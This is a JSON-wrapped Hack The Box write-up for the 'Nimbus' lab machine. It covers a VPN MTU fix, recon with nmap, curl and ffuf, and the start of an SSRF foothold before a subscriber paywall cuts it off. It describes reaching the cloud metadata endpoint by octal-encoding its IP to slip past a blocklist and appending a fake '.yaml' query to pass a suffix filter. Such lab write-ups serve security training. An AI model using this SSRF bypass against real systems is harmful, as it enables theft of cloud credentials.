{
  "$type": "site.standard.document",
  "bskyPostRef": {
    "cid": "bafyreicxwax7vsuvfmaidbhb6etq7766eu3qgbz476z7arbvtk2ggalnlq",
    "uri": "at://did:plc:gc2nrf5j5b2po5huoyw6utr4/app.bsky.feed.post/3morrb3y4jon2"
  },
  "coverImage": {
    "$type": "blob",
    "ref": {
      "$link": "bafkreicfldo6nc7gnbcg4vxqgnaypgxiaauj25waqb35s5g2oghkc4mqqe"
    },
    "mimeType": "image/jpeg",
    "size": 61004
  },
  "description": "OS: Linux · Difficulty: Hard · Theme: Cloud / AWS (LocalStack) misconfiguration Target  Attacker (tun0)  /etc/hosts  nimbus.htb aws.nimbus.htb 0. SETUP & THE MTU BLACK-HOLE (DO THIS FIRST) On the HTB VPN, tun0 defaults to MTU 1500 but the real path MTU to the target is ~1300. Oversized packets are silently dropped (no ICMP frag-needed), so small requests succeed while large ones hang forever. On the first solve a ~2.5 KB SQS send-message hu...",
  "path": "/hack-the-box-htb-nimbus-writeup-hard-weekly-june-21th-2026/",
  "publishedAt": "2026-06-20T15:39:00.000Z",
  "site": "https://1337sheets.com",
  "tags": [
    "Subscribe now"
  ],
  "textContent": "#\n\n**OS:** Linux · **Difficulty:** Hard · **Theme:** Cloud / AWS (LocalStack) misconfiguration\n\n|\n---|---\nTarget | `<TARGET_IP>`\nAttacker (tun0) | `<LHOST>`\n`/etc/hosts` | `<TARGET_IP> nimbus.htb aws.nimbus.htb`\n\n* * *\n\n## 0. Setup & the MTU black-hole (do this first)\n\nOn the HTB VPN, `tun0` defaults to MTU 1500 but the real path MTU to the target is ~1300. Oversized packets are **silently dropped** (no ICMP frag-needed), so **small** requests succeed while **large** ones hang forever. On the first solve a ~2.5 KB SQS `send-message` hung indefinitely while a tiny test went through instantly — pure MTU. Fix it up front so it never bites:\n\n\n    sudo ip link set dev tun0 mtu 1300\n\n\nConfirm connectivity and set `/etc/hosts`:\n\n\n    echo \"<TARGET_IP>  nimbus.htb aws.nimbus.htb\" | sudo tee -a /etc/hosts\n\n\nTooling: `awscli` (`sudo apt install -y awscli`), `tmux`, `curl`, `python3`.\n\n* * *\n\n## 1. Recon\n\n### nmap\n\n\n    nmap -sC -sV -p22,80 <TARGET_IP>\n\n\n\n    22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.16\n    80/tcp open  http    nginx 1.24.0 (Ubuntu)\n    |_http-title: Nimbus — Internal Job Scheduler\n\n\n### vhosts / web\n\n\n    curl -s -o /dev/null -w \"%{http_code}\\n\" http://nimbus.htb/        # 200, \"Nimbus — Internal Job Scheduler\"\n    curl -s -o /dev/null -w \"%{http_code}\\n\" http://aws.nimbus.htb/    # 403  -> LocalStack AWS API endpoint\n    curl -s -o /dev/null -w \"%{http_code}\\n\" http://nimbus.htb/jobs/preview   # 405 -> needs POST\n\n\n`aws.nimbus.htb` is discoverable via vhost fuzzing:\n\n\n    ffuf -u \"http://nimbus.htb\" -H \"Host: FUZZ.nimbus.htb\" \\\n         -w /usr/share/wordlists/dirb/big.txt -fs 178\n    # aws    [Status: 403, Size: 305]\n\n\n* * *\n\n## 2. Foothold — SSRF → IMDS credentials\n\n`POST /jobs/preview` fetches a user-supplied `url=` **server-side**. The app:\n\n  * **blocklists** the literal IMDS IP `169.254.169.254`, and\n  * applies a **suffix filter** expecting a `.yaml`-looking URL.\n\n\n\nBypass both:\n\n  * Encode the IMDS IP in **octal** : `169.254.169.254` → `0251.0376.0251.0376` (`inet_aton` accepts it; the string blocklist doesn't match).\n  * Append `?a=test.yaml` so the suffix check passes while still hitting the IMDS path.\n\n\n\n### This post is for subscribers only\n\nBecome a member to get access to all content\n\nSubscribe now",
  "title": "Hack The Box - HTB Nimbus Writeup - Hard - Weekly - June 21th, 2026",
  "updatedAt": "2026-06-21T06:40:36.027Z"
}